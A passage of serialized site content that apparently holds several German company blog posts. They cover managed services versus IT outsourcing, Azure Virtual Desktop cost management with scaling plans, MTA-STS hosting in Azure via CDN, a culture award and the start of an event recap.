Microsoft Solutions umfassend erweitert. Damit soll die Cloud Transformation bei Mittelstands- und Enterprise-Kunden weiter vorangetrieben werden. Der treibende Faktor hierbei ist die Kombination aus Managed Services, eigenen Technologien und Lösungen, die in ein umfangreiches Serviceangebot integriert werden",[7258,7272,7273],{},"³",[2548,7275,7277],{"id":7276},"der-kleine-aber-feine-unterschied","Der kleine, aber feine Unterschied",[353,7279,7280,7281,456],{},"Um Managed Service Provider zu klassifizieren, wird zunächst der Aspekt des IT-Outsourcings betrachtet. Dies ist seit den 1990er Jahren gängige Praxis. Dabei werden IT-Leistungen aus den Bereichen Infrastruktur, Anwendungen und Prozesse an einen Dienstleister übergeben. Wenn ein Unternehmen Dienstleistungen auslagert, entstehen hohe Kosten, wenn der Anbieter gewechselt wird. Sie entstehen durch Änderungen an bestehenden Prozessen, durch Vendor Lock-Ins und durch die Auslagerung großer Teile der Informationstechnologie. Daraus resultieren Verträge mit langen Laufzeiten",[7258,7282,7283],{},"⁴",[353,7285,7286,7287,456],{},"Im Gegensatz dazu beinhaltet ein Managed Service das Outsourcing von Teilbereichen der Informationstechnologie. Der Kunde behält die Hoheit und Verantwortung für die Infrastruktur. Überdies sind die Verträge so gestaltet, dass sie schnell geändert und angepasst werden können. Das schafft die notwendige Flexibilität, um sich schnell an neue Situationen anzupassen. Zusätzlich sind die Laufzeiten der Verträge eher kurz- bis mittelfristig. Ein weiterer wichtiger Unterschied im Vergleich zum IT-Outsourcing besteht darin, dass die strategische Weiterentwicklung in der Verantwortung des Kunden liegt. Dies bietet den Vorteil, dass strategische Ziele schneller erreicht werden als beim klassischen Outsourcing, bei dem der Fokus eher auf Kontinuität liegt. Allerdings muss der MSP auch die vertraglich vereinbarte Leistung erbringen. Wenn dies nicht möglich ist, da sich z.B. die strategischen Ziele des Kunden verändert haben, kann der Kunde aufgrund der kurz- bis mittelfristigen Verträge schneller zu einem anderen MSP wechseln, der die Leistung erbringen kann. Begünstigt wird dieser Prozess auch durch das partielle Outsourcing der Informationstechnologie, indem nur der betroffene Service an einen neuen MSP übergeben wird und die anderen Services unberührt bleiben",[7258,7288,7289],{},"⁵",[353,7291,7292],{},"Um den Unterschied zwischen Outsourcing und Managed Services besser zu verdeutlichen, wird das IT-Sourcing-Kontinuum von Keuper herangezogen. Dieses zeigt, dass bei Managed Services die Kontrollhoheit weiterhin beim Kunden bleibt, jedoch die Verantwortung der Leistungserbringung auf den Service Provider übertragen wird. Im Vergleich zum traditionellen Outsourcing ergeben sich daraus Vorteile sowohl für den Kunden als auch für den Dienstleister, die wir mmit dieser Blog-Serie erläutern werden.",[353,7294,7295],{},[356,7296],{"alt":7297,"src":7298},"Quadrant","https://res.cloudinary.com/c4a8/image/upload/blog/pics/msp-quadrant.png",[4208,7300,7302],{"id":7301},"literaturverzeichnis","Literaturverzeichnis",[367,7304,7305,7314,7323,7328,7333],{},[370,7306,7307],{},[374,7308,7311,7313],{"href":7309,"rel":7310},"https://resources.flexera.com/web/pdf/report-cm-state-of-the-cloud-2021-de.pdf?elqTrackId=b6a841c55b45477f9a5512838cba3c06&elqaid=6547&elqat=2",[378],[7258,7312,7260],{}," Flexera. (2021). 2021 COVID-19 accelerates cloud plans and spend as more organizations adopt multi-cloud strategies 2021 - State of the cloud report: COVID-19 accelerates cloud plans and spend as more organizations adopt multi-cloud strategies. Abgerufen am 21. März 2021.",[370,7315,7316],{},[374,7317,7320,7322],{"href":7318,"rel":7319},"https://de.statista.com/statistik/daten/studie/165458/umfrage/prognostiziertes-marktvolumen-fuer-cloud-computing-in-deutschland/",[378],[7258,7321,7264],{}," GTAI. (2019). GTAI: Marktvolumen von Cloud-Computing-Services in Deutschland von 2016 bis 2017 und Prognose bis 2021 (in Milliarden Euro). Abgerufen am 03 08 2020",[370,7324,7325,7327],{},[7258,7326,7273],{}," Keuper, F., Wagner, B. & Wysuwa, H.‑D. (2009). Managed Services - IT-Sourcing der nächsten Generation. Wiesbaden: Gabler Verlag.",[370,7329,7330,7332],{},[7258,7331,7283],{}," Krcmar, H. (2015). Informationsmanagement (Sixth edition). Berlin, Heidelberg: Springer Gabler.",[370,7334,7335],{},[374,7336,7339,7341],{"href":7337,"rel":7338},"https://de.statista.com/statistik/daten/studie/421333/umfrage/umsatz-von-microsoft-mit-cloud-systems-management-software-weltweit/",[378],[7258,7340,7289],{}," VMware. (2019). VMware. Abgerufen am 3. August 2020.",{"title":402,"searchDepth":403,"depth":403,"links":7343},[7344],{"id":7276,"depth":403,"text":7277},"Eine aktuelle Studie von Flexera¹ zeigt, dass die Nutzung von Public Cloud Solutions seit der SARS-CoV-2 Pandemie deutlich gestiegen ist. Dabei nennt die Studie Kosteneinsparungen und erhöhte Agilität als Hauptgründe für den Anstieg. Gleichzeitig vereinfacht die Nutzung von Public Cloud Solutions die Finanzplanung, da die anfallenden Kosten leichter geplant und zugewiesen werden können. Aus der Studie geht auch hervor, dass mehr als 61% der Befragten bereits Managed Service Provider (MSP) für die Verwaltung von Public Cloud Lösungen beauftragen².",{"categories":7347,"blogtitlepic":7348,"socialimg":7349,"customExcerpt":7350},[1117,1773],"head-msp-part1","blog/heads/head-msp-part1.jpg","Die Nutzung von Public Cloud Solutions in Unternehmen hat in den letzten Jahren signifikant zugenommen. Neue Funktionen werden direkt von Anbietern wie Microsoft oder Google bereitgestellt und stehen den Kunden unmittelbar zur Verfügung. Dies stellt Unternehmen vor neue Herausforderungen, da die neu hinzugefügten Features getestet, evaluiert und in die Organisation getragen werden müssen. Um die interne IT-Abteilung zu entlasten, werden Cloud Managed Service Provider für Unternehmen daher immer wichtiger.","2022-02-28","/posts/2022-02-28-managed-services-teil-1",{"title":7250,"description":7345},"posts/2022-02-28-managed-services-teil-1",[7356,1117,1773,420,7357,7358],"Managed Services","Cyber Security","IT Services","SvnVDjDVmmmD3U0yNQtcK6AR-JLYVLW6OV8JE6sLuDw",{"id":7361,"title":7362,"author":7363,"body":7364,"cta":3,"description":7368,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7430,"moment":7504,"navigation":415,"path":7505,"seo":7506,"stem":7507,"tags":7508,"webcast":406,"__hash__":7510},"content_de/posts/2022-03-30-avd-cost-management.md","Intelligentes Cost Management mit Azure Virtual Desktop",[130],{"type":350,"value":7365,"toc":7426},[7366,7369,7373,7376,7379,7385,7388,7393,7396,7400,7403,7406,7417,7420,7423],[353,7367,7368],{},"Die Nutzung von Azure Virtual Desktop setzt voraus, dass der Benutzer, der den Dienst nutzt, über eine M365-Lizenz verfügt. Dabei kann es sich um eine Windows 10 Enterprise E3/E5, Windows VDA E3/E5, M365 Business Premium Lizenz oder um eine M365 Enterprise Lizenz F3/E3/E5 handeln. Wenn ein Server-Betriebssystem für den AVD-Host verwendet wird, müssen zusätzlich eine Windows Server CAL und eine RDS CAL gekauft werden. Eine gültige Lizenz, die zur Nutzung des AVD-Dienstes berechtigt, ist also immer auch Teil der Kosten.",[2548,7370,7372],{"id":7371},"pooled-host-ansatz","Pooled Host-Ansatz",[353,7374,7375],{},"Wenn Sie den Pooled Host-Ansatz mit AVD verwenden, können Sie einem AVD-Host eine variable Anzahl von Benutzern zuweisen. Die Anzahl der Benutzer hängt von der verwendeten Arbeitslast und der Größe des Hosts ab. In unserem Beispiel rechnen wir mit 10 Benutzern pro AVD-Host. Dies entspricht in etwa einem mittleren Workload-Verhältnis. Ein Teil der Kosten setzt sich aus den Lizenzkosten zusammen. Der andere Teil sind die Infrastrukturkosten. Wenn Sie einen D4s_v3 mit 4 vCPU-Kernen und 16 GB RAM verwenden, belaufen sich die Kosten auf etwa 260,- EUR pro Monat. Hinzu kommen weitere Kosten für den Speicherplatz, den Sie nutzen. Wenn Sie also ein Azure Storage-Konto als Profilfreigabe für die Benutzer verwenden, müssen Sie auch diese Kosten einkalkulieren. Wenn Sie den Benutzern in unserem Beispiel diesen Host zuweisen und die Kosten durch 10 teilen, bedeutet es, dass der Host etwa 26,- EUR pro Monat und Benutzer kostet, zuzüglich der Kosten für die Profilfreigabe und Lizenz. Diese Kosten können mit den Skalierungsplänen für AVD gesenkt werden.",[353,7377,7378],{},"Lassen Sie uns ein anderes Szenario annehmen: Sie haben fünf AVD-Hosts mit einer Depth-First-Konfiguration. Hier verwenden Sie erneut die D4s_v3 SKU, d.h. Sie zahlen 5x 260,- EUR pro Monat und Host. Alles in allem sind das 1.300,- EUR pro Monat. Nicht ganz preiswert. Aber werden überhaupt alle Hosts ständig benötigt? Sicher nicht. Warum also nicht die Hosts außerhalb der Geschäftszeiten abschalten oder nur so viele Hosts starten, wie wirklich erforderlich sind. Warum fünf Hosts betreiben, wenn zwei davon vollkommen leer sind. Für diese Art der horizontalen Skalierung hilft Ihnen die Funktion \"Scaling Plans\" von Azure Virtual Desktop, um Kosten zu sparen.",[353,7380,7381],{},[356,7382],{"alt":7383,"src":7384},"AVD Scaling Plans","https://res.cloudinary.com/c4a8/image/upload/v1648657078/blog/pics/azure-cost-plan-01.png",[353,7386,7387],{},"Mit den Skalierungsplänen können Sie Ramp-up, Peak Time, Ramp-Down und Off-Peak definieren. Nachfolgend finden Sie eine Übersicht über die Einstellungen und ihre Beschreibung für die Skalierungspläne.",[7389,7390],"v-table",{":head":7391,":hide-container":7391,":table":7392},"true","scalingPlan",[353,7394,7395],{},"Mit dieser Option können Sie die Kosten für Ihre \"Pooled Hosts\" schnell und einfach senken. Es kann Skalierungspläne für alle \"Pooled Hosts\" sowie für verschiedene \"Pooled Hosts\" geben, die jederzeit angepasst werden können. Dies kann die Kosten um bis zu 50% senken. Darüber hinaus können Sie mit Compute-Reservierungen arbeiten, indem Sie einen oder zwei Hosts zu einem bestimmten Zeitpunkt reservieren, denn mindestens ein bis zwei Hosts sollten immer verfügbar sein. Alle zusätzlichen Hosts werden pro Nutzung bezahlt und nach Bedarf gestartet und gestoppt. Eine vertikale Skalierung für die AVD-Hosts wird nicht empfohlen. Dies würde bedeuten, dass die SKU der VM nach oben oder unten skaliert wird.",[2548,7397,7399],{"id":7398},"personal-host-ansatz","Personal Host-Ansatz",[353,7401,7402],{},"Bei \"Personal Hosts\" besteht, anders als beim \"Pooling\", eine 1:1-Beziehung zwischen Benutzern und Hosts. Das bedeutet, dass ein Host nur von einem Benutzer verwendet wird und ihm als eigener virtueller Desktop dient. Zu diesen Szenarien gehören Entwickler-Workstations oder Workstations für andere spezielle Workloads wie beispielsweise CAD. Dieser Ansatz kann auch als schnelle Lösung für Akquisitionen oder neue Mitarbeiter sowie als Arbeitsplatz für externe Lieferanten dienen.",[353,7404,7405],{},"Bei der Verwendung des Personal Host-Ansatzes ist es wichtig zu verstehen, wie der Benutzer den Host nutzt. Nutzt er ihn rund um die Uhr oder nur für ein paar Stunden am Tag? Hier können Reservierungen eine gute Lösung sein, um Kosten zu sparen. Sie lohnen sich jedoch nur, wenn der Host nicht die meiste Zeit ungenutzt ist. In den Szenarien, in denen der Host größtenteils unbelegt ist, empfiehlt es sich, mit einer Deallokation des Hosts zu arbeiten, da hierfür keine Kosten anfallen. Microsoft hat derzeit keine automatische Out-of-the-Box-Lösung für \"Personal Hosts\" auf Lager, wie etwa die Skalierungspläne. Sie müssen also selbst entscheiden, wie Sie Ihre Kosten senken wollen:",[367,7407,7408,7411,7414],{},[370,7409,7410],{},"Ungenutzte Hosts manuell herunterfahren",[370,7412,7413],{},"Verwenden der Auto-Shutdown-Funktion der Azure VMs",[370,7415,7416],{},"Nutzen der Azure-Funktion zum Herunterfahren und Freigeben der Hosts",[353,7418,7419],{},"Wir sind uns sicher alle einig, dass die erste Option in einer Produktionsumgebung nicht wirklich praktikabel ist.\nDie zweite Option ist ein guter Anfang, aber sie hat auch ihre Schwächen. So können Sie z.B. nur eine Uhrzeit pro Tag festlegen (22 Uhr) und der Benutzer kann den Rechner sofort neu starten und er läuft für die nächsten 23 Stunden weiter, bevor das automatische Herunterfahren ihn wieder stoppt. Gut, aber manuell zu konfigurieren, ist, dass der Benutzer per E-Mail gewarnt werden kann, dass sich der Rechner in 30 Minuten abschalten wird und er das Herunterfahren verschieben oder abbrechen kann.",[353,7421,7422],{},"Die dritte Möglichkeit besteht darin, eine Azure-Funktion zu verwenden und weitere Parameter für das Herunterfahren zu definieren. Wir haben dafür eine Funktion geschrieben, die die Hosts überprüft, ob es gestoppte, aber nicht freigegebene sowie leere Hosts (kein angemeldeter Benutzer) gibt. Diese werden mit deallocate heruntergefahren. Die Funktion wird alle 5 Minuten nach einem freien Zeitplan gestartet und tut, was sie tun soll. Es stellt sich jedoch die Frage, was mit den Hosts geschieht, auf denen zwar Benutzer angemeldet, aber nicht verbunden sind? Diese Hosts werden nicht heruntergefahren, da wir nicht wissen, ob der Benutzer auf dem Host einen Auftrag ausführt oder ungespeicherte Arbeit hat. Für dieses Szenario bleibt uns nur die Möglichkeit, mit den Benutzern zu vereinbaren, dass sie den Host herunterfahren oder sich wirklich abmelden, sobald sie ihre Arbeit beendet haben, aber wir alle wissen, dass dies nur in 50% der Fälle funktioniert. Alternativ können Sie lokale Registrierungseinstellungen für die Leerlaufzeit und die maximale Trennungszeit verwenden und festlegen, dass die Sitzung des Benutzers nach, sagen wir, 4 Stunden abgemeldet wird.",[353,7424,7425],{},"Alle diese Optionen sind nicht perfekt, aber sie funktionieren für den Moment und reduzieren die Kosten für persönliche Hosts bisher sehr gut.",{"title":402,"searchDepth":403,"depth":403,"links":7427},[7428,7429],{"id":7371,"depth":403,"text":7372},{"id":7398,"depth":403,"text":7399},{"categories":7431,"blogtitlepic":7432,"socialimg":7433,"customExcerpt":7434,"scalingPlan":7435},[1773],"head-azure-cost-management","blog/heads/head-azure-cost-management.jpg","Azure Virtual Desktop bietet Vorteile wie Flexibilität, hohe Verfügbarkeit und einen geringen Verwaltungsaufwand für Administratoren. Allerdings können die Kosten pro Benutzer auch höher sein. Es gibt zwei verschiedene Szenarien für AVD, die ein besseres Kosten-Nutzer-Verhältnis erzielen können.",[7436,7441,7446,7449,7453,7458,7462,7466,7470,7473,7474,7477,7478,7481,7484,7488,7491,7495,7499,7500],[7437,7438,7439,7440],"Scaling Plan Settings","Scaling Plan Sub-Settings","Value","Description",[7442,7443,7444,7445],"General","Timezone","CEST","CEST would be standard TimeZone",[402,7447,402,7448],"Schedule Name","Name of the Schedule",[402,7450,7451,7452],"Repeat on","Monday, Tuesday, Wednesday, ...","Days when this Schedule applies",[7454,7455,7456,7457],"Ramp-Up","Start Time","07:00","Point in Time, when to start the Hosts",[402,7459,7460,7461],"Balancing Algorithm","Breath-First / Depth-First","For using Autoscaling, the Depth-first load balancing option would be more relevant to {CUSTOMERS} needs as it is distributing the new user sessions to the available session host with the highest number of connections but has not reached its maximum session limit threshold which leads to minimizing the number of powered host sessions.",[402,7463,7464,7465],"Min. Percentage of Hosts","30","Specify the minimum percentage of session hosts to start for ramp-up and peak hours, the percentage is based on the total number of session hosts in {CUSTOMER} host pool, so if the host pool includes 10 VMs and the percentage is 30% as in the above image, autoscale will ensure a minimum of 3 session host is available to take user connections.",[402,7467,7468,7469],"Capacity Threshold","70","This percentage evaluates whether to turn on/off VMs during the ramp-up and peak hours. So, if your total host pool capacity is 10 sessions, and you specify a 70% Capacity threshold, once you exceed it, then autoscale will turn on additional session hosts.",[7471,7455,7456,7472],"Peak Time","Point in Time when Peak-Time Starts",[402,7459,7460,7461],[7475,7455,7456,7476],"Ramp-Down","Point in Time, when to start Ramp-Down Phase",[402,7459,7460,7461],[402,7463,7479,7480],"10","Specify the minimum percentage of session hosts to start for ramp-up and peak hours, the percentage is based on the total number of session hosts in {CUSTOMER} host pool, so if the host pool includes 10 VMs and the percentage is 10% as in the above image, autoscale will ensure a minimum of 1 session host is available to take user connections.",[402,7467,7482,7483],"80","This percentage evaluates whether to turn on/off VMs during the ramp-up and peak hours. So, if your total host pool capacity is 10 sessions, and you specify a 80% Capacity threshold, once you exceed it, then autoscale will turn on additional session hosts.",[402,7485,7486,7487],"Force logoff Users","Yes / No","Settings for logging of the connected users to be enforced.",[402,7489,7479,7490],"Delay time before logging out Users (minutes)","This option will set the session host VMs to drain mode, notify any currently signed-in users to save their work, and wait the configured amount of time before forcing the users to log off. Once all user sessions on the session host VM have been logged off, autoscale will shut down the VM.",[402,7492,7493,7494],"Notification Message","You'll be signed out soon!","You can provide a Message to currently logged in Users to take care to save work and logoff in time.",[7496,7455,7497,7498],"Off Peak Time","20:00","Point in Time, when Off-Peak-Time Starts",[402,7459,7460,7461],[7501,402,7502,7503],"Host Pool Assignment","Hostpool 1 + 2 + n","Select Hostpools, where the Scaling Plan is assigned to.","2022-03-30","/posts/2022-03-30-avd-cost-management",{"title":7362,"description":7368},"posts/2022-03-30-avd-cost-management",[1773,7509],"AVD","PChDa8wlgXHzL6g9iyGD1VrJyrICwljj8TFpkLtHp2Y",{"id":7512,"title":7513,"author":7514,"body":7515,"cta":3,"description":7599,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7600,"moment":7653,"navigation":415,"path":7654,"seo":7655,"stem":7656,"tags":7657,"webcast":406,"__hash__":7659},"content_de/posts/2022-05-31-mta-sts.md","Günstiges und einfaches MTA-STS Webhosting in Azure",[78],{"type":350,"value":7516,"toc":7597},[7517,7545,7549,7552,7555,7558,7561,7564,7567,7582,7585,7588,7591,7594],[353,7518,7519,7520,7524,7525,7528,7529,1501,7532,7536,7537,7540,7541,7544],{},"In unserem aktuellen ",[374,7521,7523],{"href":7522,"target":5319},"https://youtu.be/W-n0cPKxSw0","MTA-STS GKGAB Mechanics"," erfahren Sie, wie Sie Ihre E-Mail-Domains verschlüsselt mit ",[433,7526,7527],{},"MTA-STS zugänglich machen"," können. Dazu muss ein Webservice eine ",[433,7530,7531],{},"Datei unter Ihrer Domain",[374,7533,7534],{"href":7534,"rel":7535},"https://IhreDomain/.well-known/mta-sts.txt",[378]," bereitstellen. Das ist ein gutes Beispiel dafür, wie man so etwas heute ",[433,7538,7539],{},"mit wenigen Schritten"," implementieren kann. Wir betreiben MTA-STS für rund 20 verschiedene E-Mail-Domains und die ",[433,7542,7543],{},"Kosten belaufen sich auf einen Cent pro Monat",", da nur für Speicherplatz und Übertragung bezahlt werden muss! Sie benötigen lediglich eine Azure Subscription und eine darin enthaltene Ressource Group.",[7546,7547],"screenshot",{"v-bind":7548},"screenshot1",[7546,7550],{"v-bind":7551},"screenshot2",[7546,7553],{"v-bind":7554},"screenshot3",[7546,7556],{"v-bind":7557},"screenshot4",[7546,7559],{"v-bind":7560},"screenshot5",[353,7562,7563],{},"Kopieren Sie den Namen des CDN Endpoints (gkalderaanepmtasts.azureedge.net) für später. Da das Erstellen eines Containers mit dem Namen \".well-known\" nicht zulässig ist, benötigen wir jetzt eine Rewrite-Regel.",[7546,7565],{"v-bind":7566},"screenshot6",[353,7568,7569,7570,7574,7575,7578,7579,7581],{},"Jetzt können Sie die Datei bereits unter dem Namen des CDN Endpoints zum Testen erreichen: ",[374,7571,7572],{"href":7572,"rel":7573},"https://gkalderaanepmtasts.azureedge.net/.well-known/mta-sts.txt",[378],". Allerdings benötigen wir auch noch die Erreichbarkeit unter dem Namen jeder E-Mail-Domain, die mit MTA-STS geschützt werden soll. Der DNS CNAME im öffentlichen DNS lautet: mta-sts.IhreDomain CNAME ",[7258,7576,7577],{},"CDN endpoint name"," (z.B. gkalderaanepmtasts.azureedge.net)",[2970,7580],{},"\nDieser Name ist von Anbieter zu Anbieter unterschiedlich, bei einigen müssen sie darauf achten, einen \".\" am Ende hinzuzufügen.",[3102,7583,7584],{},"CNAME    mta-sts.gkalderaan.de    gkalderaanepmtasts.azureedge.net    300",[7546,7586],{"v-bind":7587},"screenshot7",[7546,7589],{"v-bind":7590},"screenshot8",[353,7592,7593],{},"Wie Sie hier sehen können, ist es dank der Möglichkeiten moderner Cloud-Plattformen sehr einfach, diese Anforderung umzusetzen.",[353,7595,7596],{},"Wir wünschen Ihnen viel Erfolg bei Ihrer eigenen Implementierung.",{"title":402,"searchDepth":403,"depth":403,"links":7598},[],"In unserem aktuellen MTA-STS GKGAB Mechanics erfahren Sie, wie Sie Ihre E-Mail-Domains verschlüsselt mit MTA-STS zugänglich machen können. Dazu muss ein Webservice eine Datei unter Ihrer Domain https://IhreDomain/.well-known/mta-sts.txt bereitstellen. Das ist ein gutes Beispiel dafür, wie man so etwas heute mit wenigen Schritten implementieren kann. Wir betreiben MTA-STS für rund 20 verschiedene E-Mail-Domains und die Kosten belaufen sich auf einen Cent pro Monat, da nur für Speicherplatz und Übertragung bezahlt werden muss! Sie benötigen lediglich eine Azure Subscription und eine darin enthaltene Ressource Group.",{"categories":7601,"blogtitlepic":7602,"socialimg":7603,"customExcerpt":7604,"screenshot1":7605,"screenshot2":7612,"screenshot3":7618,"screenshot4":7624,"screenshot5":7630,"screenshot6":7636,"screenshot7":7642,"screenshot8":7647},[1117,1773],"head-mta-sts","blog/heads/head-mta-sts.png","Wie Sie Ihre E-Mail-Domains verschlüsselt mit MTA-STS zugänglich machen können, ist ganz einfach. Dazu muss ein Webservice eine Datei unter Ihrer Domain bereitstellen. Dies ist in wenigen Schritten implementiert. Alles, was Sie brauchen, ist eine Azure Subscription und eine darin enthaltene Ressource Group.",{"spacing":7606,"image":7607,"source":7608,"sourceCaption":7609,"cloudinary":415,"alt":7609,"bgColor":7610,"copy":7611},"space-top-2 space-bottom-2","c_scale,w_700/blog/pics/mta-sts-img-1.jpg","https://res.cloudinary.com/c4a8/image/upload/c_scale,w_700/blog/pics/mta-sts-img-1.jpg","Resource Provider","#fcd116","In der Subscription muss der Resource Provider \"Microsoft.Cdn\" registriert werden, indem Sie ihn auswählen und auf \"Register\" klicken.",{"spacing":7606,"image":7613,"source":7614,"sourceCaption":7615,"cloudinary":415,"left":415,"alt":7615,"bgColor":7616,"copy":7617},"c_scale,w_700/blog/pics/mta-sts-img-3b.jpg","https://res.cloudinary.com/c4a8/image/upload/c_scale,w_700/blog/pics/mta-sts-img-3b.jpg","Storage Account","#5cbbff","Sie können ein bestehendes Storage Account verwenden oder ein neues anlegen. Name, Region, Redundancy (LRS reicht in der Regel aus), ansonsten gelten die Standardeinstellungen.",{"spacing":7606,"image":7619,"source":7620,"sourceCaption":7621,"cloudinary":415,"alt":7621,"bgColor":7622,"copy":7623},"c_scale,w_700/blog/pics/mta-sts-img-4.jpg","https://res.cloudinary.com/c4a8/image/upload/c_scale,w_700/blog/pics/mta-sts-img-4.jpg","New Container","#ACD653","Öffnen Sie das Storage Account und erstellen Sie einen Container mit dem Namen \"well-known\" und dem Public Access Level \"Container\". Hier werden niemals sensible Daten gespeichert, sondern nur die öffentliche mta-sts.txt.",{"spacing":7606,"image":7625,"source":7626,"sourceCaption":7627,"cloudinary":415,"left":415,"alt":7627,"bgColor":7628,"copy":7629},"c_scale,w_700/blog/pics/mta-sts-img-5.jpg","https://res.cloudinary.com/c4a8/image/upload/c_scale,w_700/blog/pics/mta-sts-img-5.jpg","Upload Blob","#0072C6","Erstellen Sie die Datei \"mta-sts.txt\" auf Ihrem Rechner (hier im Beispiel für MX-Eintrag von Exchange Online Protection)\u003Cbr />\u003Cspan class=\"highlight-yellow\">version: STSv1\u003Cbr />mode: testing\u003Cbr />mx: *.mail.protection.outlook.com\u003Cbr />max_age: 2419200\u003C/span>\u003Cbr />Dann uploaden Sie die Datei in den neuen Ordner \"well-known\".",{"spacing":7606,"image":7631,"source":7632,"sourceCaption":7633,"cloudinary":415,"alt":7633,"bgColor":7634,"copy":7635},"c_scale,w_700/blog/pics/mta-sts-img-6.jpg","https://res.cloudinary.com/c4a8/image/upload/c_scale,w_700/blog/pics/mta-sts-img-6.jpg","Azure Content Delivery Network","#F8842C","Im Storage Account wählen Sie nun \"Azure CDN\" und legen einen neuen Endpoint an:\u003Cbr />\u003Cspan class=\"highlight-yellow\">Name: z.B.   gkalderaancdnmtasts, Pricing tier: Microsoft CDN (classic), CDN endpoint name: z.B. gkalderaanepmtasts\u003C/span>\u003Cbr />Anschließend klicken Sie auf \"Create\".",{"spacing":7606,"image":7637,"source":7638,"sourceCaption":7639,"cloudinary":415,"left":415,"alt":7639,"bgColor":7640,"copy":7641},"c_scale,w_700/blog/pics/mta-sts-img-9.jpg","https://res.cloudinary.com/c4a8/image/upload/c_scale,w_700/blog/pics/mta-sts-img-9.jpg","URL Rewrite","#FCD116","Öffnen Sie den neuen Endpoint, wählen \"Rules engine > Add action > URL Rewrite\".\u003Cbr />\u003Cspan class=\"highlight-yellow\">Source pattern: /.well-known/, Destination: /well-known/\u003C/span>\u003Cbr />Bestätigen Sie Ihre Eingabe mit \"Save\"",{"spacing":7606,"image":7643,"source":7644,"sourceCaption":7645,"cloudinary":415,"alt":7645,"bgColor":7616,"copy":7646},"c_scale,w_700/blog/pics/mta-sts-img-12.jpg","https://res.cloudinary.com/c4a8/image/upload/c_scale,w_700/blog/pics/mta-sts-img-12.jpg","Customs Domains","Als Nächstes fügen wir mta-sts.IhreDomain (mta-sts.gkalderaan.com) für alle diese Domains im CDN Endpoint unter \"Custom Domains\" hinzu. Nachdem die Domain erscheint, öffnen wir sie und aktivieren HTTPS.",{"spacing":7606,"image":7648,"source":7649,"sourceCaption":7650,"cloudinary":415,"left":415,"alt":7650,"bgColor":7651,"copy":7652},"c_scale,w_700/blog/pics/mta-sts-img-13.jpg","https://res.cloudinary.com/c4a8/image/upload/c_scale,w_700/blog/pics/mta-sts-img-13.jpg","CDN Managed Certificate","#E44418","Hier erhalten Sie von Microsoft ein kostenloses und fully-managed SSL Zertifikat. Jetzt ist https://mta-sts.gkalderaan.de/.well-known/mta-sts.txt öffentlich zugänglich. Wiederholen Sie die letzten Schritte für anderen E-Mail-Domains.","2022-05-31","/posts/2022-05-31-mta-sts",{"title":7513,"description":7599},"posts/2022-05-31-mta-sts",[1117,7658,1773],"Mail","OeTjKqmnmYtMYY8vSLoltl2I6WlpHaIqwBruqYEvmEA",{"id":7661,"title":7662,"author":7663,"body":7664,"cta":3,"description":7668,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7680,"moment":7685,"navigation":415,"path":7686,"seo":7687,"stem":7688,"tags":7689,"webcast":406,"__hash__":7690},"content_de/posts/2022-06-28-accelerate-culture-award.md","Accelerate Culture Award geht an glueckkanja",[191],{"type":350,"value":7665,"toc":7678},[7666,7669,7672,7675],[353,7667,7668],{},"Im Rahmen der diesjährigen Microsoft Partner of the Year Awards erhält glueckkanja den Accelerate Culture Award. Nach mittlerweile vier Partner of the Year Award Winner/Finalist in den Bereichen Modern Workplace & Security wurde dieses Mal unser Unternehmen in seiner Gesamtheit geehrt. Mit dieser Auszeichnung würdigt Microsoft unsere positive und offene Unternehmenskultur, die wir trotz der Fusion und der COVID-Pandemie aufrechterhalten und ausbauen konnten.",[353,7670,7671],{},"Da COVID herkömmliche Treffen unmöglich machte, haben wir uns mit unseren Mitarbeiter*innen ganz besondere Alternativen ausgedacht: Tech Communities, Deep Dive Virtual Bootcamp, gemeinsames Kochen, Yogakurse, Freeletics-Aktivitäten oder gemeinsame Lauftrainings, die in der Teilnahme am Hamburger Staffelmarathon mündeten.",[353,7673,7674],{},"Das Onboarding findet jetzt in einer hybriden Form statt. Von Anfang an intensiv begleitet lernen neue Mitarbeiter*innen das Unternehmen in allen Bereichen kennen und werden durch Feedbackgespräche und ein Buddy- und Mentoring-Programm durch die ersten Wochen geführt. \"Buddies\" unterstützen bei der Eingewöhnung und vermitteln informelle Regeln und kulturelle Besonderheiten des Unternehmens. So können die neuen Kollegen und Kolleginnen schnell Kontakte knüpfen, sowohl auf zwischenmenschlicher Ebene als auch bei geschäftlichen Projekten.",[353,7676,7677],{},"Seit Beginn der Pandemie wurden rund 50 neue Mitarbeiter*innen eingestellt und ein komplett neuer Bürostandort in Helsinki eröffnet. Wir haben eine vielfältige Gruppe von Kollegen und Kolleginnen verschiedener Nationalitäten. Afghanistan, Chile, England, Finnland, Niederlande, Polen, Spanien, Syrien und USA sind nur einige der Länder, aus denen die Mitarbeiter*innen kommen. Durch eine flache Hierarchie und eine offene Unternehmenskultur, in der sich jeder auch in Projekte einbringen kann, die nicht zu seiner Stellenbeschreibung gehören, gibt es einen regen Austausch und viele Projekte können schneller und effektiver gelöst werden, da der Blick von außen oft sehr hilfreich sein kann.",{"title":402,"searchDepth":403,"depth":403,"links":7679},[],{"categories":7681,"blogtitlepic":7682,"socialimg":7683,"customExcerpt":7684},[410],"head-act-to-accelerate-collage","blog/heads/head-act-to-accelerate-collage.jpg","Trotz der COVID-Situation ist es glueckkanja gelungen, seine positive und offene Unternehmenskultur durch zahlreiche kreative Ideen zu erhalten und auszubauen. Der Zusammenschluss der beiden Unternehmen in dieser Zeit hat die positive Atmosphäre unter den Mitarbeiter*innen nicht beeinträchtigt. Mit digitalen, interaktiven Angeboten hat das Unternehmen das \"Wir‑Gefühl\" unter den Beschäftigten gestärkt.","2022-06-28","/posts/2022-06-28-accelerate-culture-award",{"title":7662,"description":7668},"posts/2022-06-28-accelerate-culture-award",[410,3933,3934],"XV--xyhIxQvpdKkD5yk-sFe6AmLLT20kLe0Iz6eeb40",{"id":7692,"title":7693,"author":7694,"body":7695,"cta":3,"description":7699,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":7720,"moment":7725,"navigation":415,"path":7726,"seo":7727,"stem":7728,"tags":7729,"webcast":406,"__hash__":7731},"content_de/posts/2022-09-13-workplace-ninja-summit-recap.md","glueckkanja @ Workplace Ninja Summit",[191],{"type":350,"value":7696,"toc":7718},[7697,7700,7703,7706,7709],[353,7698,7699],{},"Die letzten 3 Tage standen ganz im Zeichen des Workplace Ninja Summit, der vom 12. bis 14. September 2022 in Luzern, Schweiz, stattfand. Zum ersten Mal in Präsenz. Und gleich ein durchschlagender 